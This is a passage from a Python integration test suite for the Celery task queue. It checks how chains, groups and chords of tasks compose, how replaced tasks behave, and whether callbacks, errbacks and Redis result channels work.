add.s(1) c = c | chord(group(add.s(1), add.s(1)), tsum.s()) res = c() assert res.get(timeout=TIMEOUT) == 12 @flaky def test_chain_of_a_chord_and_a_group_with_two_tasks(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) c = add.si(1, 0) c = c | group(add.s(1), add.s(1)) c = c | tsum.s() c = c | add.s(1) c = c | group(add.s(1), add.s(1)) res = c() assert res.get(timeout=TIMEOUT) == [6, 6] @flaky def test_chain_of_a_chord_and_a_task_and_a_group(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) c = group(add.s(1, 1), add.s(1, 1)) c = c | tsum.s() c = c | add.s(1) c = c | group(add.s(1), add.s(1)) res = c() assert res.get(timeout=TIMEOUT) == [6, 6] @flaky def test_chain_of_a_chord_and_two_tasks_and_a_group(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) c = group(add.s(1, 1), add.s(1, 1)) c = c | tsum.s() c = c | add.s(1) c = c | add.s(1) c = c | group(add.s(1), add.s(1)) res = c() assert res.get(timeout=TIMEOUT) == [7, 7] @flaky def test_chain_of_a_chord_and_three_tasks_and_a_group(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) c = group(add.s(1, 1), add.s(1, 1)) c = c | tsum.s() c = c | add.s(1) c = c | add.s(1) c = c | add.s(1) c = c | group(add.s(1), add.s(1)) res = c() assert res.get(timeout=TIMEOUT) == [8, 8] @flaky def test_nested_chain_group_lone(self, manager): """ Test that a lone group in a chain completes. """ sig = chain( group(identity.s(42), identity.s(42)), # [42, 42] ) res = sig.delay() assert res.get(timeout=TIMEOUT) == [42, 42] def test_nested_chain_group_mid(self, manager): """ Test that a mid-point group in a chain completes. """ try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) sig = chain( identity.s(42), # 42 group(identity.s(), identity.s()), # [42, 42] identity.s(), # [42, 42] ) res = sig.delay() assert res.get(timeout=TIMEOUT) == [42, 42] def test_nested_chain_group_last(self, manager): """ Test that a final group in a chain with preceding tasks completes. """ sig = chain( identity.s(42), # 42 group(identity.s(), identity.s()), # [42, 42] ) res = sig.delay() assert res.get(timeout=TIMEOUT) == [42, 42] def test_chain_replaced_with_a_chain_and_a_callback(self, manager): if not manager.app.conf.result_backend.startswith('redis'): raise pytest.skip('Requires redis result backend.') redis_connection = get_redis_connection() redis_connection.delete('redis-echo') link_msg = 'Internal chain callback' c = chain( identity.s('Hello '), # The replacement chain will pass its args though replace_with_chain.s(link_msg=link_msg), add.s('world'), ) res = c.delay() assert res.get(timeout=TIMEOUT) == 'Hello world' await_redis_echo({link_msg, }) def test_chain_replaced_with_a_chain_and_an_error_callback(self, manager): if not manager.app.conf.result_backend.startswith('redis'): raise pytest.skip('Requires redis result backend.') redis_connection = get_redis_connection() redis_connection.delete('redis-echo') link_msg = 'Internal chain errback' c = chain( identity.s('Hello '), replace_with_chain_which_raises.s(link_msg=link_msg), add.s(' will never be seen :(') ) res = c.delay() with pytest.raises(ValueError): res.get(timeout=TIMEOUT) await_redis_echo({link_msg, }) def test_chain_with_cb_replaced_with_chain_with_cb(self, manager): if not manager.app.conf.result_backend.startswith('redis'): raise pytest.skip('Requires redis result backend.') redis_connection = get_redis_connection() redis_connection.delete('redis-echo') link_msg = 'Internal chain callback' c = chain( identity.s('Hello '), # The replacement chain will pass its args though replace_with_chain.s(link_msg=link_msg), add.s('world'), ) c.link(redis_echo.s()) res = c.delay() assert res.get(timeout=TIMEOUT) == 'Hello world' await_redis_echo({link_msg, 'Hello world'}) def test_chain_with_eb_replaced_with_chain_with_eb( self, manager, subtests ): if not manager.app.conf.result_backend.startswith('redis'): raise pytest.skip('Requires redis result backend.') redis_connection = get_redis_connection() redis_connection.delete('redis-echo') inner_link_msg = 'Internal chain errback' outer_link_msg = 'External chain errback' c = chain( identity.s('Hello '), # The replacement chain will die and break the encapsulating chain replace_with_chain_which_raises.s(link_msg=inner_link_msg), add.s('world'), ) c.link_error(redis_echo.si(outer_link_msg)) res = c.delay() with subtests.test(msg="Chain fails due to a child task dying"): with pytest.raises(ValueError): res.get(timeout=TIMEOUT) with subtests.test(msg="Chain and child task callbacks are called"): await_redis_echo({inner_link_msg, outer_link_msg}) def test_replace_chain_with_empty_chain(self, manager): r = chain(identity.s(1), replace_with_empty_chain.s()).delay() with pytest.raises(ImproperlyConfigured, match="Cannot replace with an empty chain"): r.get(timeout=TIMEOUT) def test_chain_children_with_callbacks(self, manager, subtests): if not manager.app.conf.result_backend.startswith("redis"): raise pytest.skip("Requires redis result backend.") redis_connection = get_redis_connection() redis_key = str(uuid.uuid4()) callback = redis_count.si(redis_key=redis_key) child_task_count = 42 child_sig = identity.si(1337) child_sig.link(callback) chain_sig = chain(child_sig for _ in range(child_task_count)) redis_connection.delete(redis_key) with subtests.test(msg="Chain executes as expected"): res_obj = chain_sig() assert res_obj.get(timeout=TIMEOUT) == 1337 with subtests.test(msg="Chain child task callbacks are called"): await_redis_count(child_task_count, redis_key=redis_key) redis_connection.delete(redis_key) def test_chain_children_with_errbacks(self, manager, subtests): if not manager.app.conf.result_backend.startswith("redis"): raise pytest.skip("Requires redis result backend.") redis_connection = get_redis_connection() redis_key = str(uuid.uuid4()) errback = redis_count.si(redis_key=redis_key) child_task_count = 42 child_sig = fail.si() child_sig.link_error(errback) chain_sig = chain(child_sig for _ in range(child_task_count)) redis_connection.delete(redis_key) with subtests.test(msg="Chain fails due to a child task dying"): res_obj = chain_sig() with pytest.raises(ExpectedException): res_obj.get(timeout=TIMEOUT) with subtests.test(msg="Chain child task errbacks are called"): # Only the first child task gets a change to run and fail await_redis_count(1, redis_key=redis_key) redis_connection.delete(redis_key) def test_chain_with_callback_child_replaced(self, manager, subtests): if not manager.app.conf.result_backend.startswith("redis"): raise pytest.skip("Requires redis result backend.") redis_connection = get_redis_connection() redis_key = str(uuid.uuid4()) callback = redis_count.si(redis_key=redis_key) chain_sig = chain(add_replaced.si(42, 1337), identity.s()) chain_sig.link(callback) redis_connection.delete(redis_key) with subtests.test(msg="Chain executes as expected"): res_obj = chain_sig() assert res_obj.get(timeout=TIMEOUT) == 42 + 1337 with subtests.test(msg="Callback is called after chain finishes"): await_redis_count(1, redis_key=redis_key) redis_connection.delete(redis_key) def test_chain_with_errback_child_replaced(self, manager, subtests): if not manager.app.conf.result_backend.startswith("redis"): raise pytest.skip("Requires redis result backend.") redis_connection = get_redis_connection() redis_key = str(uuid.uuid4()) errback = redis_count.si(redis_key=redis_key) chain_sig = chain(add_replaced.si(42, 1337), fail.s()) chain_sig.link_error(errback) redis_connection.delete(redis_key) with subtests.test(msg="Chain executes as expected"): res_obj = chain_sig() with pytest.raises(ExpectedException): res_obj.get(timeout=TIMEOUT) with subtests.test(msg="Errback is called after chain finishes"): await_redis_count(1, redis_key=redis_key) redis_connection.delete(redis_key) def test_chain_child_with_callback_replaced(self, manager, subtests): if not manager.app.conf.result_backend.startswith("redis"): raise pytest.skip("Requires redis result backend.") redis_connection = get_redis_connection() redis_key = str(uuid.uuid4()) callback = redis_count.si(redis_key=redis_key) child_sig = add_replaced.si(42, 1337) child_sig.link(callback) chain_sig = chain(child_sig, identity.s()) redis_connection.delete(redis_key) with subtests.test(msg="Chain executes as expected"): res_obj = chain_sig() assert res_obj.get(timeout=TIMEOUT) == 42 + 1337 with subtests.test(msg="Callback is called after chain finishes"): await_redis_count(1, redis_key=redis_key) redis_connection.delete(redis_key) def test_chain_child_with_errback_replaced(self, manager, subtests): if not manager.app.conf.result_backend.startswith("redis"): raise pytest.skip("Requires redis result backend.") redis_connection = get_redis_connection() redis_key = str(uuid.uuid4()) errback = redis_count.si(redis_key=redis_key) child_sig = fail_replaced.si() child_sig.link_error(errback) chain_sig = chain(child_sig, identity.si(42)) redis_connection.delete(redis_key) with subtests.test(msg="Chain executes as expected"): res_obj = chain_sig() with pytest.raises(ExpectedException): res_obj.get(timeout=TIMEOUT) with subtests.test(msg="Errback is called after chain finishes"): await_redis_count(1, redis_key=redis_key) redis_connection.delete(redis_key) def test_task_replaced_with_chain(self): orig_sig = replace_with_chain.si(42) res_obj = orig_sig.delay() assert res_obj.get(timeout=TIMEOUT) == 42 def test_chain_child_replaced_with_chain_first(self): orig_sig = chain(replace_with_chain.si(42), identity.s()) res_obj = orig_sig.delay() assert res_obj.get(timeout=TIMEOUT) == 42 def test_chain_child_replaced_with_chain_middle(self): orig_sig = chain( identity.s(42), replace_with_chain.s(), identity.s() ) res_obj = orig_sig.delay() assert res_obj.get(timeout=TIMEOUT) == 42 def test_chain_child_replaced_with_chain_last(self): orig_sig = chain(identity.s(42), replace_with_chain.s()) res_obj = orig_sig.delay() assert res_obj.get(timeout=TIMEOUT) == 42 class test_result_set: @flaky def test_result_set(self, manager): assert_ping(manager) rs = ResultSet([add.delay(1, 1), add.delay(2, 2)]) assert rs.get(timeout=TIMEOUT) == [2, 4] @flaky def test_result_set_error(self, manager): assert_ping(manager) rs = ResultSet([raise_error.delay(), add.delay(1, 1)]) rs.get(timeout=TIMEOUT, propagate=False) assert rs.results[0].failed() assert rs.results[1].successful() class test_group: @flaky def test_ready_with_exception(self, manager): if not manager.app.conf.result_backend.startswith('redis'): raise pytest.skip('Requires redis result backend.') g = group([add.s(1, 2), raise_error.s()]) result = g.apply_async() while not result.ready(): pass @flaky def test_empty_group_result(self, manager): if not manager.app.conf.result_backend.startswith('redis'): raise pytest.skip('Requires redis result backend.') task = group([]) result = task.apply_async() GroupResult.save(result) task = GroupResult.restore(result.id) assert task.results == [] @flaky def test_parent_ids(self, manager): assert_ping(manager) g = ( ids.si(i=1) | ids.si(i=2) | group(ids.si(i=i) for i in range(2, 50)) ) res = g() expected_root_id = res.parent.parent.id expected_parent_id = res.parent.id values = res.get(timeout=TIMEOUT) for i, r in enumerate(values): root_id, parent_id, value = r assert root_id == expected_root_id assert parent_id == expected_parent_id assert value == i + 2 @flaky def test_nested_group(self, manager): assert_ping(manager) c = group( add.si(1, 10), group( add.si(1, 100), group( add.si(1, 1000), add.si(1, 2000), ), ), ) res = c() assert res.get(timeout=TIMEOUT) == [11, 101, 1001, 2001] @flaky def test_large_group(self, manager): assert_ping(manager) c = group(identity.s(i) for i in range(1000)) res = c.delay() assert res.get(timeout=TIMEOUT) == list(range(1000)) def test_group_lone(self, manager): """ Test that a simple group completes. """ sig = group(identity.s(42), identity.s(42)) # [42, 42] res = sig.delay() assert res.get(timeout=TIMEOUT) == [42, 42] def test_nested_group_group(self, manager): """ Confirm that groups nested inside groups get unrolled. """ sig = group( group(identity.s(42), identity.s(42)), # [42, 42] ) # [42, 42] due to unrolling res = sig.delay() assert res.get(timeout=TIMEOUT) == [42, 42] def test_nested_group_chord_counting_simple(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) gchild_sig = identity.si(42) child_chord = chord((gchild_sig, ), identity.s()) group_sig = group((child_chord, )) res = group_sig.delay() # Wait for the result to land and confirm its value is as expected assert res.get(timeout=TIMEOUT) == [[42]] def test_nested_group_chord_counting_chain(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) gchild_count = 42 gchild_sig = chain((identity.si(1337), ) * gchild_count) child_chord = chord((gchild_sig, ), identity.s()) group_sig = group((child_chord, )) res = group_sig.delay() # Wait for the result to land and confirm its value is as expected assert res.get(timeout=TIMEOUT) == [[1337]] def test_nested_group_chord_counting_group(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) gchild_count = 42 gchild_sig = group((identity.si(1337), ) * gchild_count) child_chord = chord((gchild_sig, ), identity.s()) group_sig = group((child_chord, )) res = group_sig.delay() # Wait for the result to land and confirm its value is as expected assert res.get(timeout=TIMEOUT) == [[1337] * gchild_count] def test_nested_group_chord_counting_chord(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) gchild_count = 42 gchild_sig = chord( (identity.si(1337), ) * gchild_count, identity.si(31337), ) child_chord = chord((gchild_sig, ), identity.s()) group_sig = group((child_chord, )) res = group_sig.delay() # Wait for the result to land and confirm its value is as expected assert res.get(timeout=TIMEOUT) == [[31337]] def test_nested_group_chord_counting_mixed(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) gchild_count = 42 child_chord = chord( ( identity.si(42), chain((identity.si(42), ) * gchild_count), group((identity.si(42), ) * gchild_count), chord((identity.si(42), ) * gchild_count, identity.si(1337)), ), identity.s(), ) group_sig = group((child_chord, )) res = group_sig.delay() # Wait for the result to land and confirm its value is as expected. The # group result gets unrolled into the encapsulating chord, hence the # weird unpacking below assert res.get(timeout=TIMEOUT) == [ [42, 42, *((42, ) * gchild_count), 1337] ] @pytest.mark.xfail(raises=TimeoutError, reason="#6734") def test_nested_group_chord_body_chain(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) child_chord = chord(identity.si(42), chain((identity.s(), ))) group_sig = group((child_chord, )) res = group_sig.delay() # The result can be expected to timeout since it seems like its # underlying promise might not be getting fulfilled (ref #6734). Pick a # short timeout since we don't want to block for ages and this is a # fairly simple signature which should run pretty quickly. expected_result = [[42]] with pytest.raises(TimeoutError) as expected_excinfo: res.get(timeout=TIMEOUT / 10) # Get the child `AsyncResult` manually so that we don't have to wait # again for the `GroupResult` assert res.children[0].get(timeout=TIMEOUT) == expected_result[0] assert res.get(timeout=TIMEOUT) == expected_result # Re-raise the expected exception so this test will XFAIL raise expected_excinfo.value def test_callback_called_by_group(self, manager, subtests): if not manager.app.conf.result_backend.startswith("redis"): raise pytest.skip("Requires redis result backend.") redis_connection = get_redis_connection() callback_msg = str(uuid.uuid4()).encode() redis_key = str(uuid.uuid4()) callback = redis_echo.si(callback_msg, redis_key=redis_key) group_sig = group(identity.si(42), identity.si(1337)) group_sig.link(callback) redis_connection.delete(redis_key) with subtests.test(msg="Group result is returned"): res = group_sig.delay() assert res.get(timeout=TIMEOUT) == [42, 1337] with subtests.test(msg="Callback is called after group is completed"): await_redis_echo({callback_msg, }, redis_key=redis_key) redis_connection.delete(redis_key) def test_errback_called_by_group_fail_first(self, manager, subtests): if not manager.app.conf.result_backend.startswith("redis"): raise pytest.skip("Requires redis result backend.") redis_connection = get_redis_connection() errback_msg = str(uuid.uuid4()).encode() redis_key = str(uuid.uuid4()) errback = redis_echo.si(errback_msg, redis_key=redis_key) group_sig = group(fail.s(), identity.si(42)) group_sig.link_error(errback) redis_connection.delete(redis_key) with subtests.test(msg="Error propagates from group"): res = group_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) with subtests.test(msg="Errback is called after group task fails"): await_redis_echo({errback_msg, }, redis_key=redis_key) redis_connection.delete(redis_key) def test_errback_called_by_group_fail_last(self, manager, subtests): if not manager.app.conf.result_backend.startswith("redis"): raise pytest.skip("Requires redis result backend.") redis_connection = get_redis_connection() errback_msg = str(uuid.uuid4()).encode() redis_key = str(uuid.uuid4()) errback = redis_echo.si(errback_msg, redis_key=redis_key) group_sig = group(identity.si(42), fail.s()) group_sig.link_error(errback) redis_connection.delete(redis_key) with subtests.test(msg="Error propagates from group"): res = group_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) with subtests.test(msg="Errback is called after group task fails"): await_redis_echo({errback_msg, }, redis_key=redis_key) redis_connection.delete(redis_key) def test_errback_called_by_group_fail_multiple(self, manager, subtests): if not manager.app.conf.result_backend.startswith("redis"): raise pytest.skip("Requires redis result backend.") redis_connection = get_redis_connection() expected_errback_count = 42 redis_key = str(uuid.uuid4()) errback = redis_count.si(redis_key=redis_key) # Include a mix of passing and failing tasks group_sig = group( *(identity.si(42) for _ in range(24)), # arbitrary task count *(fail.s() for _ in range(expected_errback_count)), ) group_sig.link_error(errback) redis_connection.delete(redis_key) with subtests.test(msg="Error propagates from group"): res = group_sig.delay() with pytest.raises(ExpectedException): res.get(timeout=TIMEOUT) with subtests.test(msg="Errback is called after group task fails"): await_redis_count(expected_errback_count, redis_key=redis_key) redis_connection.delete(redis_key) def test_group_children_with_callbacks(self, manager, subtests): if not manager.app.conf.result_backend.startswith("redis"): raise pytest.skip("Requires redis result backend.") redis_connection = get_redis_connection() redis_key = str(uuid.uuid4()) callback = redis_count.si(redis_key=redis_key) child_task_count = 42 child_sig = identity.si(1337) child_sig.link(callback) group_sig = group(child_sig for _ in range(child_task_count)) redis_connection.delete(redis_key) with subtests.test(msg="Chain executes as expected"): res_obj = group_sig() assert res_obj.get(timeout=TIMEOUT) == [1337] * child_task_count with subtests.test(msg="Chain child task callbacks are called"): await_redis_count(child_task_count, redis_key=redis_key) redis_connection.delete(redis_key) def test_group_children_with_errbacks(self, manager, subtests): if not manager.app.conf.result_backend.startswith("redis"): raise pytest.skip("Requires redis result backend.") redis_connection = get_redis_connection() redis_key = str(uuid.uuid4()) errback = redis_count.si(redis_key=redis_key) child_task_count = 42 child_sig = fail.si() child_sig.link_error(errback) group_sig = group(child_sig for _ in range(child_task_count)) redis_connection.delete(redis_key) with subtests.test(msg="Chain fails due to a child task dying"): res_obj = group_sig() with pytest.raises(ExpectedException): res_obj.get(timeout=TIMEOUT) with subtests.test(msg="Chain child task errbacks are called"): await_redis_count(child_task_count, redis_key=redis_key) redis_connection.delete(redis_key) def test_group_with_callback_child_replaced(self, manager, subtests): if not manager.app.conf.result_backend.startswith("redis"): raise pytest.skip("Requires redis result backend.") redis_connection = get_redis_connection() redis_key = str(uuid.uuid4()) callback = redis_count.si(redis_key=redis_key) group_sig = group(add_replaced.si(42, 1337), identity.si(31337)) group_sig.link(callback) redis_connection.delete(redis_key) with subtests.test(msg="Chain executes as expected"): res_obj = group_sig() assert res_obj.get(timeout=TIMEOUT) == [42 + 1337, 31337] with subtests.test(msg="Callback is called after group finishes"): await_redis_count(1, redis_key=redis_key) redis_connection.delete(redis_key) def test_group_with_errback_child_replaced(self, manager, subtests): if not manager.app.conf.result_backend.startswith("redis"): raise pytest.skip("Requires redis result backend.") redis_connection = get_redis_connection() redis_key = str(uuid.uuid4()) errback = redis_count.si(redis_key=redis_key) group_sig = group(add_replaced.si(42, 1337), fail.s()) group_sig.link_error(errback) redis_connection.delete(redis_key) with subtests.test(msg="Chain executes as expected"): res_obj = group_sig() with pytest.raises(ExpectedException): res_obj.get(timeout=TIMEOUT) with subtests.test(msg="Errback is called after group finishes"): await_redis_count(1, redis_key=redis_key) redis_connection.delete(redis_key) def test_group_child_with_callback_replaced(self, manager, subtests): if not manager.app.conf.result_backend.startswith("redis"): raise pytest.skip("Requires redis result backend.") redis_connection = get_redis_connection() redis_key = str(uuid.uuid4()) callback = redis_count.si(redis_key=redis_key) child_sig = add_replaced.si(42, 1337) child_sig.link(callback) group_sig = group(child_sig, identity.si(31337)) redis_connection.delete(redis_key) with subtests.test(msg="Chain executes as expected"): res_obj = group_sig() assert res_obj.get(timeout=TIMEOUT) == [42 + 1337, 31337] with subtests.test(msg="Callback is called after group finishes"): await_redis_count(1, redis_key=redis_key) redis_connection.delete(redis_key) def test_group_child_with_errback_replaced(self, manager, subtests): if not manager.app.conf.result_backend.startswith("redis"): raise pytest.skip("Requires redis result backend.") redis_connection = get_redis_connection() redis_key = str(uuid.uuid4()) errback = redis_count.si(redis_key=redis_key) child_sig = fail_replaced.si() child_sig.link_error(errback) group_sig = group(child_sig, identity.si(42)) redis_connection.delete(redis_key) with subtests.test(msg="Chain executes as expected"): res_obj = group_sig() with pytest.raises(ExpectedException): res_obj.get(timeout=TIMEOUT) with subtests.test(msg="Errback is called after group finishes"): await_redis_count(1, redis_key=redis_key) redis_connection.delete(redis_key) def test_group_child_replaced_with_chain_first(self): orig_sig = group(replace_with_chain.si(42), identity.s(1337)) res_obj = orig_sig.delay() assert res_obj.get(timeout=TIMEOUT) == [42, 1337] def test_group_child_replaced_with_chain_middle(self): orig_sig = group( identity.s(42), replace_with_chain.s(1337), identity.s(31337) ) res_obj = orig_sig.delay() assert res_obj.get(timeout=TIMEOUT) == [42, 1337, 31337] def test_group_child_replaced_with_chain_last(self): orig_sig = group(identity.s(42), replace_with_chain.s(1337)) res_obj = orig_sig.delay() assert res_obj.get(timeout=TIMEOUT) == [42, 1337] def assert_ids(r, expected_value, expected_root_id, expected_parent_id): root_id, parent_id, value = r.get(timeout=TIMEOUT) assert expected_value == value assert root_id == expected_root_id assert parent_id == expected_parent_id def assert_ping(manager): ping_result = manager.inspect().ping() assert ping_result ping_val = list(ping_result.values())[0] assert ping_val == {"ok": "pong"} class test_chord: @flaky def test_simple_chord_with_a_delay_in_group_save(self, manager, monkeypatch): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) if not isinstance(manager.app.backend, BaseKeyValueStoreBackend): raise pytest.skip("The delay may only occur in the cache backend") x = BaseKeyValueStoreBackend._apply_chord_incr def apply_chord_incr_with_sleep(self, *args, **kwargs): sleep(1) x(self, *args, **kwargs) monkeypatch.setattr(BaseKeyValueStoreBackend, '_apply_chord_incr', apply_chord_incr_with_sleep) c = chord(header=[add.si(1, 1), add.si(1, 1)], body=tsum.s()) result = c() assert result.get(timeout=TIMEOUT) == 4 @flaky def test_redis_subscribed_channels_leak(self, manager): if not manager.app.conf.result_backend.startswith('redis'): raise pytest.skip('Requires redis result backend.') manager.app.backend.result_consumer.on_after_fork() initial_channels = get_active_redis_channels() initial_channels_count = len(initial_channels) total_chords = 10 async_results = [ chord([add.s(5, 6), add.s(6, 7)])(delayed_sum.s()) for _ in range(total_chords) ] channels_before = get_active_redis_channels() manager.assert_result_tasks_in_progress_or_completed(async_results) channels_before_count = len(channels_before) assert set(channels_before) != set(initial_channels) assert channels_before_count > initial_channels_count # The total number of active Redis channels at this point # is the number of chord header tasks multiplied by the # total chord tasks, plus the initial channels # (existing from previous tests). chord_header_task_count = 2 assert channels_before_count <= \ chord_header_task_count * total_chords + initial_channels_count result_values = [ result.get(timeout=TIMEOUT) for result in async_results ] assert result_values == [24] * total_chords channels_after = get_active_redis_channels() channels_after_count = len(channels_after) assert channels_after_count == initial_channels_count assert set(channels_after) == set(initial_channels) @flaky def test_replaced_nested_chord(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) c1 = chord([ chord( [add.s(1, 2), add_replaced.s(3, 4)], add_to_all.s(5), ) | tsum.s(), chord( [add_replaced.s(6, 7), add.s(0, 0)], add_to_all.s(8), ) | tsum.s(), ], add_to_all.s(9)) res1 = c1() assert res1.get(timeout=TIMEOUT) == [29, 38] @flaky def test_add_to_chord(self, manager): if not manager.app.conf.result_backend.startswith('redis'): raise pytest.skip('Requires redis result backend.') c = group([add_to_all_to_chord.s([1, 2, 3], 4)]) | identity.s() res = c() assert sorted(res.get()) == [0, 5, 6, 7] @flaky def test_add_chord_to_chord(self, manager): if not manager.app.conf.result_backend.startswith('redis'): raise pytest.skip('Requires redis result backend.') c = group([add_chord_to_chord.s([1, 2, 3], 4)]) | identity.s() res = c() assert sorted(res.get()) == [0, 5 + 6 + 7] @flaky def test_eager_chord_inside_task(self, manager): from .tasks import chord_add prev = chord_add.app.conf.task_always_eager chord_add.app.conf.task_always_eager = True chord_add.apply_async(args=(4, 8), throw=True).get() chord_add.app.conf.task_always_eager = prev def test_group_chain(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) c = ( add.s(2, 2) | group(add.s(i) for i in range(4)) | add_to_all.s(8) ) res = c() assert res.get(timeout=TIMEOUT) == [12, 13, 14, 15] def test_nested_group_chain(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) c = chain( add.si(1, 0), group( add.si(1, 100), chain( add.si(1, 200), group( add.si(1, 1000), add.si(1, 2000), ), ), ), add.si(1, 10), ) res = c() assert res.get(timeout=TIMEOUT) == 11 @flaky def test_single_task_header(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) c1 = chord([add.s(2, 5)], body=add_to_all.s(9)) res1 = c1() assert res1.get(timeout=TIMEOUT) == [16] c2 = group([add.s(2, 5)]) | add_to_all.s(9) res2 = c2() assert res2.get(timeout=TIMEOUT) == [16] def test_empty_header_chord(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) c1 = chord([], body=add_to_all.s(9)) res1 = c1() assert res1.get(timeout=TIMEOUT) == [] c2 = group([]) | add_to_all.s(9) res2 = c2() assert res2.get(timeout=TIMEOUT) == [] @flaky def test_nested_chord(self, manager): try: manager.app.backend.ensure_chords_allowed() except NotImplementedError as e: raise pytest.skip(e.args[0]) c1 = chord([ chord([add.s(1, 2), add.s(3, 4)], add.s([5])), chord([add.s(6, 7)], add.s([10])) ], add_to_all.s(['A'])) res1 = c1() assert res1.get(timeout=TIMEOUT) == [[3, 7, 5, 'A'], [13, 10, 'A']] c2 = group([ group([add.s(1, 2), add.s(3, 4)]) | add.s([5]), group([add.s(6, 7)]) | add.s([10]), ]) | add_to_all.s(['A']) res2 = c2() assert res2.get(timeout=TIMEOUT) == [[3, 7, 5, 'A'], [13, 10, 'A']] c = group([ group([ group([ group([ add.s(1, 2) ]) | add.s([3]) ]) | add.s([4]) ]) | add.s([5]) ]) | add.s([6]) res = c() assert [[[[3, 3], 4], 5], 6] == res.get(timeout=TIMEOUT) @flaky def test_parent_ids(self, manager): if not manager.app.conf.result_backend.startswith('redis'): raise pytest.skip('Requires redis result backend.') root = ids.si(i=1) expected_root_id = root.freeze().id g = chain( root, ids.si(i=2), chord( group(ids.si(i=i) for i in range(3, 50)), chain(collect_ids.s(i=50) | ids.si(i=51)), ), ) self.assert_parentids_chord(g(), expected_root_id) @flaky def test_parent_ids__OR(self, manager): if not manager.app.conf.result_backend.startswith('redis'): raise pytest.skip('Requires redis result backend.') root = ids.si(i=1) expected_root_id = root.freeze().id g = ( root | ids.si(i=2) | group(ids.si(i=i) for i in range(3, 50)) | collect_ids.s(i=50) | ids.si(i=51) ) self.assert_parentids_chord(g(), expected_root_id) def assert_parentids_chord(self, res, expected_root_id): assert isinstance(res, AsyncResult) assert isinstance(res.parent, AsyncResult) assert isinstance(res.parent.parent, GroupResult) assert isinstance(res.parent.parent.parent, AsyncResult) assert isinstance(res.parent.parent.parent.parent, AsyncResult) # first we check the last task assert_ids(res, 51, expected_root_id, res.parent.id) # then the chord callback prev, (root_id, parent_id, value) = res.parent.get(timeout=30) assert value == 50 assert root_id == expected_root_id # started by one of the chord header tasks. assert parent_id in res.parent.parent.results # check what the chord callback recorded for i, p in enumerate(prev): root_id, parent_id, value = p assert root_id == expected_root_id assert parent_id == res.parent.parent.parent.id # ids(i=2) root_id, parent_id, value = res.parent.parent.parent.get(timeout=30) assert value == 2 assert parent_id == res.parent.parent.parent.parent.id assert root_id == expected_root_id # ids(i=1) root_id, parent_id, value = res.parent.parent.parent.parent.get( timeout=30) assert value == 1 assert root_id == expected_root_id assert parent_id is None def test_chord_on_error(self, manager): from celery import states from .tasks import ExpectedException if not manager.app.conf.result_backend.startswith('redis'): raise pytest.skip('Requires redis result backend.') # Run the chord and wait for the error callback to finish. Note that # this only works for old style callbacks since they get dispatched to # run async while new style errbacks are called synchronously so that # they can be passed the request object for the failing task. c1 = chord( header=[add.s(1, 2), add.s(3, 4), fail.s()], body=print_unicode.s('This should not be called').on_error( errback_old_style.s()), ) res = c1() with pytest.raises(ExpectedException): res.get(propagate=True) # Got to wait for children to populate. check = ( lambda: res.children, lambda: res.children[0].children, lambda: res.children[0].children[0].result, ) start = monotonic() while not all(f() for f in check): if monotonic() > start + TIMEOUT: raise TimeoutError("Timed out waiting for children") sleep(0.1) # Extract the results of the successful tasks from the chord. # # We could do this inside the error handler, and probably would in a # real system, but for the purposes of the test it's obnoxious to get # data out of the error handler. # # So for clarity of our test, we instead do it here. # Use the error callback's result to find the failed task. uuid_patt = re.compile( r"[0-9A-Fa-f]{8}-([0-9A-Fa-f]{4}-){3}[0-9A-Fa-f]{12}" ) callback_chord_exc = AsyncResult( res.children[0].children[0].result ).result failed_task_id = uuid_patt.search(str(callback_chord_exc)) assert (failed_task_id is not None), "No task ID in %r" % callback_chord_exc failed_task_id = failed_task_id.group() # Use new group_id result metadata to get group ID. failed_task_result = AsyncResult(failed_task_id) original_group_id = failed_task_result._get_task_meta()['group_id'] # Use group ID to get preserved group result. backend = fail.app.backend j_key = backend.get_key_for_group(original_group_id, '.j') redis_connection = get_redis_connection() # The redis key is either a list or zset depending on configuration if manager.app.conf.result_backend_transport_options.get( 'result_chord_ordered', True ): job_results = redis_connection.zrange(j_key, 0, 3) else: job_results = redis_connection.lrange(j_key, 0, 3) chord_results = [backend.decode(t) for t in job_results] # Validate group result assert [cr[3] for cr in chord_results if cr[2] == states.SUCCESS] == \ [3, 7] assert len([cr for cr in chord_results if cr[2] != states.SUCCESS] ) == 1 @flaky def test_generator(self, manager): def assert_generator(file_name): for i in range(3): sleep(1) if i == 2: with open(file_name) as file_handle: # ensures chord header generators tasks are processed incrementally #3021 assert file_handle.readline() == '0\n', "Chord header was unrolled too early" yield write_to_file_and_return_int.s(file_name, i) with tempfile.NamedTemporaryFile(mode='w', delete=False) as tmp_file: file_name = tmp_file.name c = chord(assert_generator(file_name), tsum.s()) assert c().get(timeout=TIMEOUT) == 3 @flaky def test_parallel_chords(self, manager): try: manager.app.backend.ensure_chords_allowed() except 